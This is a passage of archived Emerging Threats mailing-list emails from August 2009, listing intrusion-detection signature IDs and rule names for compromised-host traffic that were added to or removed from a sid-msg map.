url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510180 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (91) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510181 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (91) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510182 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (92) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510183 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (92) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510184 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (93) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510185 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (93) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510186 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (94) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510187 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (94) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510188 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (95) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510189 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (95) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510190 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (96) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510191 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (96) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510192 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (97) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510193 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (97) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510194 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (98) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510195 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (98) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510196 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (99) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510197 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (99) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510198 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (100) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510199 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (100) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510200 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (101) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510201 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (101) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510202 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (102) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510203 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (102) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510204 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (103) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510205 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (103) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510206 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (104) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510207 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (104) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510208 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (105) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510209 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (105) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510210 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (106) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510211 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (106) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510212 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (107) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510213 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (107) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510214 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (108) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510215 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (108) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510216 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (109) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510217 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (109) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510218 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (110) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510219 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (110) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510220 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (111) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510221 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (111) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510222 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (112) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510223 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (112) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510224 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (113) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510225 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (113) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510226 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (114) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510227 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (114) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510228 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (115) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510229 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (115) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510230 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (116) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510231 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (116) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510232 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (117) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510233 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (117) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts -> Removed from emerging-sid-msg.map.txt (129): 2009126 || ET TROJAN Possible bot C&C Checkin || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Downloader_General || url,doc.emergingthreats.net/2009126 2500170 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (86) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500171 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (86) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500172 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (87) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500173 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (87) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500174 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (88) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500175 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (88) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500176 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (89) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500177 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (89) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500178 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (90) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500179 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (90) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500180 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (91) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500181 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (91) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500182 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (92) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500183 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (92) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500184 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (93) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500185 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (93) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500186 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (94) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500187 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (94) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500188 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (95) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500189 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (95) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500190 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (96) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500191 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (96) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500192 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (97) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500193 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (97) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500194 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (98) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500195 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (98) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500196 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (99) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500197 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (99) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500198 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (100) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500199 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (100) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500200 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (101) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500201 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (101) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500202 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (102) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500203 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (102) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500204 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (103) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500205 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (103) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500206 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (104) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500207 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (104) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500208 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (105) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500209 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (105) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500210 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (106) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500211 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (106) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500212 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (107) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500213 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (107) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500214 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (108) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500215 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (108) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500216 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (109) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500217 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (109) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500218 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (110) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500219 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (110) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500220 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (111) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500221 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (111) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500222 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (112) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500223 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (112) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500224 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (113) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500225 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (113) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500226 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (114) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500227 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (114) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500228 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (115) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500229 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (115) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500230 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (116) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500231 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (116) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500232 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (117) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500233 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (117) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510170 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (86) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510171 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (86) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510172 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (87) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510173 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (87) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510174 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (88) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510175 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (88) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510176 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (89) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510177 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (89) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510178 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (90) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510179 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (90) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510180 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (91) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510181 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (91) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510182 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (92) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510183 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (92) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510184 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (93) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510185 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (93) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510186 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (94) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510187 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (94) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510188 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (95) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510189 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (95) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510190 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (96) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510191 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (96) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510192 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (97) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510193 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (97) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510194 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (98) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510195 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (98) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510196 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (99) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510197 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (99) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510198 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (100) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510199 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (100) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510200 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (101) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510201 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (101) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510202 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (102) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510203 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (102) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510204 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (103) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510205 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (103) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510206 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (104) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510207 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (104) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510208 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (105) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510209 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (105) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510210 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (106) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510211 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (106) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510212 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (107) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510213 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (107) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510214 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (108) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510215 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (108) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510216 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (109) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510217 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (109) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510218 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (110) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510219 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (110) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510220 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (111) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510221 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (111) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510222 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (112) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510223 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (112) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510224 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (113) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510225 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (113) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510226 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (114) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510227 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (114) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510228 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (115) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510229 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (115) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510230 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (116) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510231 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (116) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510232 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (117) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510233 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (117) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts From emerging at emergingthreats.net Sun Aug 9 16:00:12 2009 From: emerging at emergingthreats.net (emerging@emergingthreats.net) Date: Sun, 9 Aug 2009 16:00:12 -0400 (EDT) Subject: [Emerging-Sigs] Emerging Threats Daily Signature Changes Message-ID: <20090809200012.AE4114504A@goliath.jonkmans.com> [***] Results from Oinkmaster started Sun Aug 9 16:00:12 2009 [***] [*] Rules modifications: [*] None. [+++] Added non-rule lines: [+++] -> Added to emerging-sid-msg.map (88): 2500170 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (86) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500171 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (86) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500172 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (87) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500173 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (87) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500174 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (88) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500175 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (88) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500176 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (89) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500177 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (89) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500178 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (90) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500179 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (90) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500180 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (91) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500181 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (91) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500182 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (92) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500183 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (92) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500184 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (93) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500185 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (93) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500186 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (94) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500187 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (94) || 